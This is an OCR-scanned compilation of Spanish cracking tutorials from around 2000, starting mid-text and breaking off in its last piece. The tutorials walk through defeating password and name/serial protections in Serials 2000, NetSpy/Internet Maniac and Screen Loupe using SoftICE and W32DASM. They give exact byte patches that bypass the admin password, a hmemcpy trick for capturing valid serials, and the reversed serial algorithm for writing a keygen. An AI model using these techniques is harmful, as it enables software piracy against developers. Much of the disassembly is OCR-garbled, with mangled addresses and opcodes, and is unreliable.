byte ptr [eax] = primer caracter de EAX...en EAX esta situada nuestra password. 
68 = Ascii.... usa Softlce para convertir 68 (escribe ?68) y te saldrá: 'h'. 


Si el primer caracter de EAX es igual a 'h' entonces no saltará y continuaremos con la siguiente instrucción... 


Como puedes ver todas las comparaciones son del mismo estilo... 


La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 
La segunda comparación es: (( byte ptr [eax+1] )) con (( 61 )) 
La tercera comparación es: (( byte ptr [eax+2] )) con (( 63 )) 
La cuarta comparación es: (( byte ptr [eax+3] )) con (( 6 
La quinta comparación es: (( byte ptr [eax+4] )) con (( 
La sexta comparación es: (( byte ptr [eax+5] )) con (( 68 ) 
La séptima comparación es: (( byte ptr [eax+6] )) con (( 6 
La octava comparación es: (( byte ptr [eax+7] )) con (( 73 


B )) 
74 )) 
) 
9)) 
)) 
Entoces el password correcto es: 

68(h) 6l(a) 63(c) 6b(k) 74(x) 68(x) 69x) 730) 
x = hazlo tu mismo :) 


ok, ya está hecho todo el trabajo... como puedes ver ha sido realmente fácil conseguir el password correcto... solo 
hemos necesitado analizar un poco el código. 


Ahora vamos a jugar un poco... conseguir solo el password no es suficiente para nuestras retorcidas cabezas :). 


Jugando con el Código 12Parte 
INTRODUCIR CUALQUIER PASSWORD 


hmm, ¿porqúe tenemos que poner siempre el password para entrar al menú? ahora podemos jugar con el código y 
hacer que acepte cualquier password... es facilito, ya lo verás. 


Observa que el checkeo de longitud de password o cada checkeo de los caractéres tiene un J NE, dirigido 
hacia el offset 0O040348C. 

Esto hace que si el password no es correcto, se nos salta el offset 00403485 y por lo tanto no se cumple la 
instrucción, que debería mover 1 (mov) a la posición [esi+60)]. 


Este 1 le dice al programa en un posterior checkeo (que no hace falta ni buscar) si hemos introducido el password 
correcto. 


:00403483 7507 jne 0040348C 


:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 


¿Como podemos arreglar esto?... si, hay varios métodos... 
e Cambiar todas las instrucciones JNE por NOP (nop=instrucción que no hace nada). 


Esta es una forma muy sucia... demasiados bytes parcheados... funcionará, pero yo creo que cuantos 
menos bytes parcheados mejor es el crack. 


e Hacer al código saltar directamente a 00403485 (la intrucción que pone 1 en [esi+60]) 
Esta es una forma más limpia... solo 2 bytes serán cambiados. 


Ok, entonces cambiaremos el primer J NE (el del checkeo de longitud) a un J MP (el J MP hace que salte siempre... 
ya no es una condición) a donde queremos. 


Original: 00403454 “7536 jne 0040348C 


Primero haz los cambios en el Softl ce (antes de hacer una modificación real en el fichero) para probar si todo va 
bien. 


Para hacer el cambio, vete a ese offset (comienza el proceso usando F1O para llegar allí). 
Cuando ya estes situado en el offset q queremos, escribe: a 


Ahora puedes editar ese offset... escribe la nueva instrucción: jmp 403485 y pulsa enter. 


Parcheado: 00403459 EB2F jmp 00403485 


Los bytes han sidos cambiados (en memoria), después de haber hecho esto, desactiva todos los breakpoints (ld) 
y continua la ejecución normal, .. 


whouuu!!!!, funciona perfectamente :), ahora s2k acepta cualquier cosa q pongamos, incluso una password en 
blanco. 


Haré una explicación cortita de como parchear el ejecutable permanentemente... 

Coje un buen editor hexadecimal como por ejemplo hiew (dos) o ultraedit (windows), vete al offset donde esta la 
instrucción que queremos cambiar y modifica sus bytes. 

Estos son los bytes originales: 75 36 | Y estos los cambiados: EB 2F 

(La traducción a hexadecimal la obtienes en el softice) 

Para ir a la localización exacta, utiliza un conversor de offset/hex. 


Jugando con el Código 22Parte 
DIRECTAMENTE AL MENÚ 


Bueno Bueno... :)... esto cada vez se pone más interesante. 


Ya hemos conseguido el password, hemos hecho que acepte cualquier cosa que metamos... que nos falta? 

aha, la perfección :)... y para que queremos que nos salga ese menú de meter el password si aceptará cualquier 
cosa?, ahora vamos a hacer que directamente cuando le demos a la opción en la barra de menú se salte el rollo 
ese de meter el password y nos abra directamente la ventana con las opciones de 'administrador.. 


Ya has visto lo facil que es trabajar con el código y modificarle sabiendo que es lo que hace. 
Ahora tampoco se va a complicar mucho más, pq solo tenemos que hacer una busqueda y unos pequeños cambios 
teniendo en cuenta todos los conocimientos que hemos adquirido sobre este programa anteriormente. 


Ok, vamos al atakeerrrr! 
Organización... 
ler Paso: Buscar llamada al Menu 'Administration Tools' 


22 Paso: Hacer que se salte el menu ese del password y que vaya directamente a donde queremos, teniendo en 
cuenta q la llamada que se hace al menu del password devuelve una respuesta como ya sabemos (recordad el 
mov 1 a esi+60). 


3er Paso: Hacer permanentes nuestros cambios en el ejecutable e irnos por hay a dar una vuelta con la novia 
(eso solo si teneís la suerte de tener una :))). 


Comenzamos, 

Como lo que buscamos es la creación de un menú, lo mejor para encontrar quien o que llama a este menú será 
desensamblar el ejecutable con el W32DSM. 

Hacemos una copia del ejecutable y la desensamblamos... ningún problema para hacerlo... ni Antiw32dsm, ni 


encriptaciones, ni compresores... nada... joer q rollo :) 


También podriamos hacerlo con Softl ce, pero mejor usamos W32DSM para q resulte más facil y veamos como 
atacar a la victima con distintas aplicaciones. 


Pues para buscar el menú que nos interesa no tenemos más que mirar en el DIALOG | NFORMATION que está al 
principio de la 'dead list": 


Name: DialogID_0092, * of Controls=004, Caption:"Password Verification", ClassName:"" 
001 -—- ControlID:0406, Control Class: "EDIT" Control Text:"" 

002 -— ControlID:0001, Control Class: "BUTTON" Control Text: "sok" 

003 -—- ControlID:0002, Control Class:"BUTTON" Control Text: "sCancel" 

004 -— ControlIlD:FFFF, Control Class: "STATIC" Control Text:"Enter Admin. Password:" 


Aquí lo tenemos... 
El dato más importante es el de 'Dialogl D_0092', que nos servirá para encontrar cuando es llamado este menú. 


Damos a Search, Find Text, y ponemos 'Dialogl D_0092... ploff... hay está :) 
* Possible Reference to Dialog: DialogID_0092 


Ahora solo tenemos que subir para arriba y observar quien hace referencia a esta llamada... bueno ya lo sabemos 
(el click al menú de arriba)... pero lo que queremos saber realmente es donde ocurre esto. 


Pues subimos unas cuantas líneas y hay está!. 


* Referenced by a CALL at Address: 
| :00402974 


Jeje, una CALL ha llamado aquí... exactamente ha sido la localizada en el OffSet 00402974... ya tenemos a 
nuestra victima rodeada, bueno vamos allí a ver q encontramos. 


:00402974 E837090000 call 004032B0 
:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 


* Reference To: MFC42.Ordinal:09D2, Ord:09D2h 


:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


hmm, interesante... 


A mi ya se me ocurre una idea de que hace aquí el programa... pero mejor vamos directamente a Softl ce a verlo 
en tiempo de ejecución. 


Para esto hay q poner un Breakpoint en el offset 402974, ah, ahora recuerdo que esto suele causar problemas a 
muchos newbies. 

Voy a explicar como poner correctamente el Breakpoint para evitar mensajes como 'I nvalid Address' o que no 
funcione. 


Softl ce necesita que le demos una referencia de que app debe ser la actuada mediante el breakpoint. Para esto 
usaremos el Symbol Loader, aplicación incluida con Softl ce que tendrás en tu carpeta de Numega Softl ce. 


Ok, abrimos el symbol loader, y en File/Open Module abrimos el ejecutable del Serials 2000. 
C:YProgram FilesiSerials 20001 Serial2k.exe - loaded successfully 


Bueno, ahora para ejecutarle no tenemos mas que dar en Module/ Load o el icono de los engranajes. 
Nos saldrá un error sin importacia, le damos ok, y sigue la ejecución del Serials 2k. 


Plof!, Softl ce aparece ante nuestros ojos... este es el momento perfecto para meter el breakpoint. Como podrás 
comprobar en la barrita verde aparece que esta procesando en el ejecutable del Serials 2000. 


Metemos el BreakPoint: BPX 402974, y le damos a F5 para que continue cargando. 
Ya está el anzuelo puesto jejeje, ahora solo tenemos que hacerle picar. 
Pulsamos File/Administration Tools... y... como queriamos, Softlce salta antes de que aparezca ninguna ventana 


inutil. 


Estamos viendo el código que anteriormente veíamos con W32DSM... con la ventaja de que ahora podemos ver 
que hace cada llamada y los posteriores saltos. 


:00402974 E837090000 call 004032B0 

:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 
:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


Aparecemos en 402974 como nuestro breakpoint le había dicho al fiel Softl ce, pulsamos F10 para pasar a la 
siguiente instrucción y observamos que no ocurre nada (en pantalla), seguimos hasta la siguiente call y al pulsar 
F10 sobre está nos aparece la ventana de introducir password. 

Ya sabemos donde está la función que abré esa ventana. Si nos metemos en la call (con F8) y damos unas cuantas 
vueltas, llegaremos hasta el código dónde se encuentran las comparaciones que hemos estudiado anteriormente. 
Pero ahora no es necesario eso. 


Solo tenemos que anular esa llamada y adecuar la comprobación de la respuesta que se obtiene a nuestras 
necesidades. 


Primero vamos a hacerlo todo en un modo temporal para ir comprobando que sucede con cada instrucción 
importante. 


La primera instrucción (call 004032b0) aparentemente no hace nada que no queramos, por lo que no la 
cambiamos. 


La siguiente call es la que llama a la ventana de meter el password... vamos a deshacernos de ella, cambiando sus 
bytes actuales por NOPs (90). 

Cuando estamos situados en 0040298B, escribimos DB 40298B, entonces en la ventana de datos (arriba) 
aparecerán los bytes de esta instrucción. 


Pues pulsamos con el botón del ratón arriba en el primero y sustituimos todos los bytes por 90. 


Entonces quedaría asi: 


Inicialmente: E8 E8 D8 00 00 
Modificado: 90 90 90 90 90 


Cuando pulsamos intro, vemos como en la ventana de instrucciones hay un cambio y aparecen 5 nops en vez de la 
anterior call. 


ya podemos ir pulsando F10 y pasando cada NOP. 


Hasta que llegamos a los saltos de comprobación. 


:0040298B E8E8D80000 Cal11 00410278 5 Nops <> Call q llama al password. 
:00402990 83F801 cmp eax, 00000001 | Compara EAX con 1... 

:00402993 “7571 jne 00402A06 |Salta si EAX no es = 1 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si EAX es 0 

:004029A0 7452 je 004029F4 [Salta sies 0 


Como vemos al ir pulsando F1O por el código, después de la primera comparación, saltará y entonces el programa 
no hará nada. Eso es equivalente a que pulsemos el botón Cancel en la ventana de meter el password. 


La segunda comparación (test eax, eax) y su correspondiente salto condicional también hacen de las suyas :). 
Aquí también saltará al offset 0O4029F4, haciendo aparecer directamente el messagebox de Invalid Password. 


Pues ya está todo resuelto... nos tenemos que deshacer de la call que llama a la ventana de password y evitar los 
dos saltos condicionales. 


Podriamos dejarlo 'mu pofesional' convirtiendo el primer call en una instrucción que nos mueva a EAX un 1, y asi el 
salto condicional que tenemos a continuación no saltase nunca. 

Después hay una instrucción que mueve a EAX algo situado en esp+00000104. Si lo que mueve es un 0, el salto 
condicional de la siguiente línea nos llevará a la ventana de 'invalid password', entonces pondremos un 1 también, 
asi este salto se portará adecuadamente y nos dejará seguir sin problemas. 


Todo esto son pijadillas... para hacer algo rapido podemos llenar de NOPs la call y los saltos y seguro que 
funciona. Pero esto demuestra que sabemos lo que estamos haciendo. 


El cambio lo realizamos en memoria con Softl ce... 
Esto ya debería estar claro como hacerlo. 


Para que el programa se vuelva a cargar en memoria correctamente (anulando todos los cambios que hicimos 
anteriormente), le cerramos y le volvemos a cargar con el Symbol Loader. 


Entonces activamos nuestro efectivo breakpoint en 402974 y comenzamos con las modificaciones finales. 


Usando F10, llegamos hasta 0040298B. Escribimos a en softice y hacemos nuestra bonita modificación de mover a 
EAX un 1 :). 


a [enter] 
mov eax, 1 


Ya está.. hmmm pero tenemos que tener en cuenta una cosa. La anterior instrucción (la call) usaba 5 bytes, 
hemos tenido suerte, y nuestra instrucción (el mov) ocupa también 5. Entonces no tendremos q añadir nada para 
rellenar. 


Entonces el código quedaría asi: 
Inicialmente: E8 E8 D8 00 00 (call 00410278) 
Nuevo código: B8 01 00 00 00 (mov eax, 1) 


Ahora nos queda hacer el otro cambio... es en 402995. 
Nos situamos allí y escribimos a en Softl ce. Ahora ponemos lo que queremos: 


mov eax, 1 


ya está... hmmmmmm ahora si que tenemos el 'problema' ese. Nuestra nueva instrucción ocupa 5 bytes, y la 
antigua ocupaba 7. 
Bueno, solamente tendremos que rellenar los dos bytes de diferencia con 2 nops. 


Ponemos DB 402995 en softl ce, y en la parte de arriba nos aparecen los bytes de ese offset. 
Solo tenemos que poner 90 90 en el 00 00 que queda al final de la instrucción y ya está arreglado. 


Entonces el código quedaría asi: 
Inicialmente: 8B 84 24 04 01 00 00 (mov eax, dword ptr [esp+00000104]) 
Nuevo código: B8 01 00 00 00 90 90 (mov eax, 1| nop | nop ) 


Resumen: 

Código Inicial: 

:0040298B E8E8D80000 Call 00410278 | Llamada a la ventana de Password 
:00402990 83F801 cmp eax, 00000001 | Eax no es 1 si damos cancel 
:00402993 7571 jne 00402A06 | Vuelve al programa 


:00402995 8B842404010000 mov eax, dword ptr [esp+00000104]| a eax resultado checkeos 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si eax es 0. 

:004029A0 7452 je 004029F4 | Si es 0, salta a Invalid password. 


Código 'Reparado': 


:0040298B B801000000 mov eax, 1 | (Nuevo) -—- Mueve 1 a eax 
:00402990 83F801 cmp eax, 00000001 | Eax siempre será 1 
:00402993 7571 jne 00402A06 | Nunca saltará 

:00402995 B801000000 mov eax, 1 | (Nuevo) Mueve 1 a eax 
:0040299A 90 nop | (relleno) 

:0040299B 90 nop | (relleno) 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | eax lo pusimos en l... 
:004029A0 7452 je 004029F4 | Nunca saltará 


Ok, ya está, ahora le damos en File/Administrationm Tools y directamente nos abré la ventana de opciones sin 
pedir ni password ni leches. :) 


El cambio para que sea permantente en el ejecutable se realiza como ya explique antes... solo hay que modificar 
los bytes con un editor hexadecimal y listo. 


Despedida, agradecimientos y esas cosas.... 


Ha quedado un tutorial bastante extenso, pero es lo que ocurre cuando se explica todo y no se da nada por 
supuesto... cosa que he intentado hacer (menos en lo de parchear los ejecutables) para que nadie se quede con 
dudas o atascado en cierto punto o haga cosas solo porque las pone aquí sin razonar el porqué. 


Si os ha gustado este tutorial hacedmelo saber escribiendome a tntcrackteamt hotmail.com. 
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Nos vemos en el próximo Tutorial... 


Tutor by: XASX 


Capturar un serial valido mediante la función hmemcpy 


06 de Marzo de 2K 


Crack: Sable 


Herramientas: Softlce 3.x 4.x 


Introducción: 


Hola, este es mi primer tut y por medio de él quiero compartir un 
truco que me enseñaron unos amigos. 

Esta vez no usaremos los Apis típicos como ser: 
GetWindowText(a) o GetDlgltemText(a) sino que haremos uso de 
“hmemcpy”, no es un Api pero es el mejor. 

Este tut se lo dedico al amigo Karpoff. 


Al Atake: 


Carga el Sice (así le llamaremos al SoftIce, OK) y pon un 
breakpoint en hmemcpy o sea que debes escribir esto BPX 
HMEMCPY y presiona “Enter”; listo ya pusiste el breakpoint. 
Ahora carga el programa víctima e introduce tus datos y el 
numero de registro falso por Ej: 


Name: Sable 
Serial: 123456 


Luego presionas aceptar y ya estas dentro del Sice. 


Lo que debes hacer ahora puede parecer un poco loco o sin 
sentido pero tienes que hacerlo es parte del truco. 

Aprieta F10, entre 17 a 25 veces, hasta que veas algo parecido a 
esto: 


PUSH ECX 

SHR ECX,2 ; el número de palabras para copiar 

REPZ MOVSD copia desde ds:esi (32 bit) a es:edi (32 bit) (tu 
debes pararte aquí) 

POP ECX 

AND ECX,3 

REPZ MOVSB :igual que repz movsd, pero solo un byte 
XOR DX 

XOR AX 


Listo? Bueno, entonces escribí en el Sice esto y presiona enter: 
D DS:ESTI (si tu programa es de 32 bit) o D DS:SI (si es del6 bit) 


En este momento debes ver en la Ventana de Datos tu nombre o el 
número de serie falso u otra cosa que pusiste. 
Muy bien sigamos, ahora debes escribir esto: 


D ES:EDI (si tu programa es de32 bit) o D ES:DI (si es de 16 bit) 


Esto mostrará el lugar donde se copiará la información por Ej.: 
22bf:00000000 

Notas el segmento extraño (22bf). Si pusiéramos un BPR en este 
rango de memoria no rompería en lo absoluto. Al haber apretado 
F10 anteriormente toda la información que introdujiste es copiada 


en “repz movsb”. 
Vas entendiendo hasta ahora. 
A esta altura tu debes estar tecleando: 


PAGE 22BF:00000000 (este es solo en Ej. Tu debes poner el offset 
que tengas en la ventana de datos). Luego presiona enter (después 
de introducir un comando en el Sice siempre debes apretar enter) 
y verás algo parecido a esto: 


Linear Physical Attributes Type 


80284960 01603960 PDAURW System 


Lo que harás ahora es poner un BPR (punto de ruptura en el 
rango de memoria) a la dirección de situación lineal. Para hacer 
esto necesitas saber cuantos bytes están en el rango, para esto 
debes usar el seleccionador 30. 


Ejemplo: 

BPR 30:80284960 30:50284969 RW 

Esto apenas puso un descanso en el rango para 9 bytes durante el 
acceso a RW (lectura-escritura). 

Si tu no sabes como sumar los 9 bytes para conseguir el número 
que aparece en verde puedes tipear lo siguiente: 

D 30:80284960 


Y podrás copiarlo de la ventana de datos. 


Siempre usa el seleccionador 30, porque siempre está. 


Todo lo que hemos hecho es básicamente para no tener que estar 
preteando (F12) como bestias. Este truco es sumamente útil para 
los programas de 16 bits, porque el segmento siempre cambia. 


Ahora puedes quitar el bpx hmemcpy ( bc 00) y comenzar a 
teclear alegremente FS, observa bien la ventana de datos por que 
en cualquier momento aparecerá tu serial válido. 


Importante: 


“El uso de este material es solo para uso educativo, por ahora los 
cracks son ilegales cada cual es responsable del uso que le de a este 
tutorial, el autor no se hace responsable de nada.” 


Saludos a Todos 
Sable 
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NetSpy 1.5 - Cómo regalar un programa a través de la winAP!.... 


Saludos koleguitas! en este texto vamos a ver cómo por vagancia o ignorancia un 
programador nos regala su producto por usar funciones incluídas en la winAPlI que 
supongo que ya sabréis es un conjunto de librerías que contienen funciones preparadas 
como apoyo al programador para hacerle el trabajo más fácil y también para hacérnoslo 
a nosotros claro... 


Antes de nada agradecer a Mr.Black toda su ayuda, desde sugerirme el programa hasta 
ayudarme con el win32ASM, que le vamos a hacer soy muy torpe, a pesar de seguir el 
ejemplo de Mr.Crimson y de tener el código completito no he sido capaz sin su ayuda de 
codificar el keygen, la programación no es lo mío... 


¿? Herramientas a utilizar : 


NetSpy 1.5 por Sumit Birla. 
SoftlCe 4.0 de Numega Tech. 
WDASM 8.93 de URSoftware 


¿? Cambiando de método... 


Normalmente los programas de tipo "name/serial" los repaso directamente con SoftlCe, 
en muchos me llevo el trastazo cuando luego los desensamblo (menudo palabro) ya que 
veo que habría sido más fácil empezar por desensamblarlo, en esta ocasión como no 
tenía SoftlCe cargado y por no reiniciar pues empecé tirando de WDASM y SDRs, el 
ejecutable protegido es Internet Maniac.exe ... 


+ PTeferenced br a (D/nconditional or (Cjonditional Jump at Address: 
|:004051c1 15) 
| 


* Possible S5tringbata Pef from Data 0b3 -+"Failure!" 
| 
20040520F 6SBS354100 push 004135B8 


* Possible Stringbata Pef from Pata 0b3 ->+"Incorrect registration code!" 
| 

20040514 68285354100 push 00413598 

200405219 56 push exsi 


+ Peference To: USER>32.MessageBoxA, Ó0rd:01C3k 
| 
200405214 FF1554114100 Call deord ptr [00411154] 


Mil veces visto, tenemos nuestra "messagebox" y a ella nos lleva un salto 
condicional...vamos a verlo...listado muerto pa la people...ya veo a más de uno como 
loco invirtiendo el salto, no! ;P 


c20040514Db £D54d2448 lea edx, dword ptr [esp+42] | 
200405181 S8D442408 lea eax, dword ptr [esp+0858] 
:004051BE5 52 push edx 

200405186 £0 push eax | 
20405180 230408 add esp, 00000008 | 
c2004051EF S5cÓ0 test ax, Sax 

200405101 44A Je O004050oT 


* Heference To: EKEPNEL3Z.WritePrivateProfileSstringA, Urd:0313h 


La dirección que está en rojo es el salto anterior, si no saltamos al mensaje de error qué 
hacemos? pues escribir los datos de registro en un fichero .ini mediante la función de la 
API que véis en azul...seguimos en busca del serial correcto así que vemos antes de 
nuestro salto condicional que se mete algo en eax y edx, luego se pasa a la función, 
serán nombre y serial? seguro...una bonita llamada, canta un poquito, vamos a ver qué 
nos dice la amiguita... 


200407FD4d BB7Y42dZ8 mor es, dword ptr [esp+z28] 
20040 7FDS 56 push exsi 


* Peference To: KEPRNELS2. l1strleni, Ord:0335h 
| 


20040 7FDS FF1560104100 Call duord ptr [00411060] 
0040 7PFDF S3FS04 cop eax, DOD0o0o0bood 

2040 7FEZ “LO? Jae DO4O7FER 

200407FE4 33520 XOF ax, eax 

2O0O04dO07FEÉS 5E pop esil 

20040 7FEY 23040 add esp, DODo00ozo 
O04dO07?FEA ES ret 


Aparecemos por aquí, una bonita llamada a otra función de la API, a esta función 
simplemente le pasamos la dirección que apunta a una cadena y ella nos devuelve en 
eax su longitud en este caso en bytes, sin haber tocado SoftlCe nos podemos hacer una 
idea al ver la comparación y el salto, el nombre o el número tienen que ser al menos de 4 
bytes de longitud ya que como veis si el salto no se da ponemos eax a 0 y volvemos de 
la llamada, recordáis qué había después de la llamada? si EAX=0 "Error número 
incorrecto”...Vamos a seguir con los nuestro, evitando el mensaje de error, el salto se 
cumple, a ver qué sigue... 


+ HReferenced by a (Winconditional or (Cionditional Jump at Address: 


2OOdO7FEE OFEE14601 mMoOvYsx eax, byte ptr [esi+01] 
3OOdO7FEF OFBE1¿EOZ mMOYSX e0x, byte ptr [esi+0z] 
20040 7FF3 D1IEO shl eax, 1 

2O0O04dO7FFS 50 push eax 

200407FF6 OFEE4EOS mMoOrsx eax, byte ptr [esi+03] 
00407 FFA Cl1El102 shl ecx, ÓZ 

20040 7FFDE 5l push ecx 

20040 FFE BES0A4000000 mov ecx, DODODODA 

200408003 29 cda 

200408004 F7FS idivr ecx 

200408006 ESAOCOS4FA mor eax, FisdCóaA0 

2004O0S00BE SBLA mor eCcx, edx 

2 0040S800D ESEO sh1l eax, el 

20040S800F SDb4c2406 lea ecx, dword ptr [esp+0C] 
200408013 50 push eax 


* Possible Stringlata Pef from Pata 063 -+"*010u-+d+d" 
| 

200408014 68385384100 push O00413B38 

2004080139 51 push ecx 


+ Peference To: USERS. wseprintiíi4, Ord:0ZE 3h 
| 
200408014 FF1544114100 Call deord ptr [00411144] 


Sorpresa agradable, tenemos ahí abajo una llamada a wsprintfA, esa API simplemente da 
un formato determinado a los datos que le pasemos como parámetros, el formato se 
determina mediante especificaciones como la que tenemos en verde jum jum tiene buena 
pinta. No sabemos qué tenemos en ESI pero me apostaría el pescuezo a que es el 
nombre y el programa está calculando el serial verdadero, vamos a ver un poco más 
abajo... 


+ Reference To: USERS32 weprintfi, Ord: 02B3h 
| 


20405014 FF1544114100 Call duord ptr [00411144] 
¿00408020 6B542440 mor edx, dword ptr [esp+40] 
2004058024 E3E414 add esp, 00000014 

2 00dO0s0z7 SD4ddZ404 lea eax, dword ptr [esp+04] 
c004d0S80zZzB 5 push edx 

c20040s0zc 50 push eax 


+ PTeference To: KEPNEL3Z.l1strempA, 0rd:032%h 
| 


20d O0S0EDb FF1544104100 Call duord ptr [00411044] 
200405033 FYDS ne eax 

¿00408035 1Ec0 shk eax, eax 

200408037 5E pop esi 

00405038 40 inc eax 

200408039 E3SE4z0 add esp, O00000zbo 
0040580 3c Es ret. 


Viendo esto ya me apuesto a mi hermana, el resultado de wsprintfA, es comparado con 
algo mediante la función IstrempA, a esta función le pasamos como parámetros las 
direcciones de las cadenas a comparar, si los valores son iguales la función devuelve en 
EAX el valor CERO, después hacemos unas operaciones con EAX y volvemos de la 
llamada, EAX no es cero luego registro correcto, escribimos los datos en el fichero .ini y 
gracias por pagar hermano... 


¿? Comprobando con SoftICe... 


Todo esto son suposiciones así que vamos a nuestro amigo SoftlCe a que nos lo 
confirme, cargamos el Internet Maniac...metemos unos datos falsos (ambos mayores o 
iguales a 4 para no salir prematuramente), pasamos a SoftlCe y ponemos un punto de 
ruptura tal que << bpx hmemcpy >>, le damos al botón de aceptar y aparecemos en 
SoftlCe, vamos dando << F12 >> hasta estar en el código del Internet Maniac, una vez allí 
borramos nuestro bpx << bc 0 >> y ponemos otro justo antes del CALL, en la dirección 
:004051AD << bpx 4051 AD>>, le pegamos a << F5 >> y ya tenemos el rollo, aquí están las 
instrucciones explicadas según vamos a ir viéndolas, creo que a estas alturas SOftlCe 
debería estar controlado... 


lea edx, dword ptr 
[esp+48] 
lea eax, dword ptr 
[esp+08] 


:004051 AD 
:004051B1 
:004051B5 push edx 


:004051B6 push eax 


:004051B7 call 00407FDO 
:00407FDO sub esp, 00000020 
:00407FD3 push esi 


mov esi, dword ptr 


:00407FD4 [esp+28] 


:00407FD8 push esi 


, Call 
ii a EÓS KERNEL32.IstrlenA 


:00407FDF cmp eax, 00000004 
:00407FE2 jge 00407FEB 


movsx eax, byte ptr 
[esi+01] 


movsx ecx, byte ptr 
[esi+02] 


:00407FEB 
:00407FEF 


:00407FF3 shl eax, 1 


:00407FF5 push eax 


movsx eax, byte ptr 
[esi+03] 


:00407FFA shl ecx, 02 


:00407FF6 


:00407FFD push ecx 

:00407FFE mov ecx, 0000000A 
:00408003 cdq 
:00408004 ¡div ecx 
:00408006 mov eax, FA34C6A0 


:0040800B mov ecx, edx 


:0040800D shl eax, cl 


¿cargamos en edx la dirección donde tenemos el 
número de serie falso 


¡cargamos en eax la dirección donde tenemos el 
nombre 


:empilamos las dos direcciones, le pasamos a la 
rutina que controla el registro 


:los parámetros para que decida si son correctos los 
datos 


¿vamos a la rutina 
¡ajustes en la pila 
:salvamos el valor de ESI 


¿movemos a esi el nombre 


:se lo pasamos a la función para que calcule su 
longitud 


:calculando... 


si es menor que 4 registro incorrecto... 


si es mayor vamos por buen camino... 


¡dejamos en eax el segundo byte de nuestro nombre 
(ASCII segunda letra) 


¡dejamos en ecx el tercer byte de nuestro nombre 


:¡desplazamos eax un byte a la izquierda = añadimos 
un cero a la derecha 


:empilamos ese valor **para wsprintfA** 


¡dejamos en eax tenemos el cuarto byte de nuestro 
nombre 


:¡desplazamos ECX dos bytes a la izquierda 
:empilamos ese valor **para wsprintfA** 
:inicializamos ECX a 10 

¡reseteamos EDX 

¡EAX = EAX /entera ECX , EDX = resto 
¡EAX contiene número mágico 


¡ECX contiene el resto de la división entera anterior 


:¡desplazamos número mágico un número de bytes 
igual al resto obtenido 


-0040800F lea ecx, dword ptr metemos en ECX la dirección donde guardaremos 


[esp+0C] serial verdadero 
:00408013 push eax :empilamos ese valor **para wsprintfA** 
:00408014 push 00413B38 ¡le pasamos a wsprintfA el formato %010u-%d%d 


¡le pasamos a wsprintfA la dirección donde dejar el 


:00408019 push ecx resultado (serial verdadero) 


. Call j 

:0040801A USER32.wsprintfA :calculando... 

-00408020 MOV edx, dword ptr ¡edx apunta al número de serie que hemos 
[esp+40] introducido (el falso =)) 

:00408024 add esp, 00000014 ¡ajustes en la pila... 

-00408027 lea eax, dword ptr :en EAX tenemos la dirección donde está el serial 
[esp+04] verdadero 

:0040802B push edx ¡pasamos los parámetros a la función que los 

compara 

:0040802C push eax 

:0040802D call ¡comparando 

KERNEL32.IstrempA *9TP e 

:00408033 neg eax :el resultado de la comparación es negado 


:restamos teniendo en cuenta el flag de acarreo, C=1 
luego EAX=EAX-EAX-1 


:00408037 pop esi ¡devolvemos a ESI el valor anteriormente salvado 


:00408035 sbb eax, eax 


:00408038 inc eax ¡incrementamos EAX 
:00408039 add esp, 00000020 ¡ajustes en la pila 
:0040803C ret ¡volvemos de la llamada 
:004051BC add esp, 00000008 ¡ajustes en la pila... 


:004051BF test eax, eax :es correcto nuestro número de serie? 


miramos el flag de cero, Z=1 luego es más falso que 


:004051C1 je 0040520D Moe, No Registrado! 


Bueno es tremendamente sencillo sacar un número correcto, y el keygen no es nada del 
otro mundo, sólo tenemos que trasladar el algoritmo y que saque el resultado en vez de 
chequearlo...esto queda para vuestras aventajadas mentes... 


¿? Last words... 


Como siempre dejar claro que karlitoxZ no es más que un novato en esto, mucho camino 
todavía por recorrer... aquí estoy para serviros en lo que me sea posible... 


Karpoff Spanish Tutor 


Programa: Screen Loupe Magnifier v 4.7 
Win95/Nt 


PROTECCION: | NAME / SERIAL 


Descripcion: aplicación para dar zoom en ciertas partes de tu pantalla 
Dificultad: Principiante 


DOWNLOAD: | http://www, execpc. cony —sbd 


Herramientas: Soft-| ce 


CRACKER: Profesor X /TnT FECHA: 24/04/2000 


| INTRODUCCION 


Bueno amigos antes que nada quisisera decirles que si encuentran algun error en el tutorial favor de 
hacermelo saber a mi correo electronico profesor_xhotmail.com, ya que esta es mi primera vez que hago un 
tutorial espero poder explicar la forma de sacar un numero de serie valido para el Screen Loupe Magnifier v 
4.7 for Windows 95 /Nt.- 


| AL ATAKE 


bueno empezemos para este proposito usaremos el SOFT-ICE con el cual obtendremos un numero de serie valido, que 
variara segun el nombre y organizacion que insertemos en la ventana de registro ok!! 


les hago una pregunta amigos!!! cual seria el proceso a seguir para obtener el numero de serie, reflexionemos un 
poco.mmmm... bueno sale ya esta... lo esencial aqui seria encontrar la rutina en la cual el programa compara nuestro numero 
de serie con el numero de serie original, tambien podriamos ocupar otra forma de ataque la que seria modificando un salto 
condicional, pero como se dice aqui en mi pais 


INTESA ES OTRA HISTORIA !!!! JAJA 


por ahora ocuparemos la primera opcion que es la de buscar un serial valido ok!!! 


lo primero sera reiniciar la P-CERA y cargar el SOFT-ICE una vez cargado el softice abrimos el programa screen loupe y nos 
vamos a el menu Help=>Register eh insertamos un User NAme, Organization, y cualquier registro en mi caso insertare: 


User Name: PrOfEsOr X 
Organization: TnT Crack Team 
Registrations: 111111 


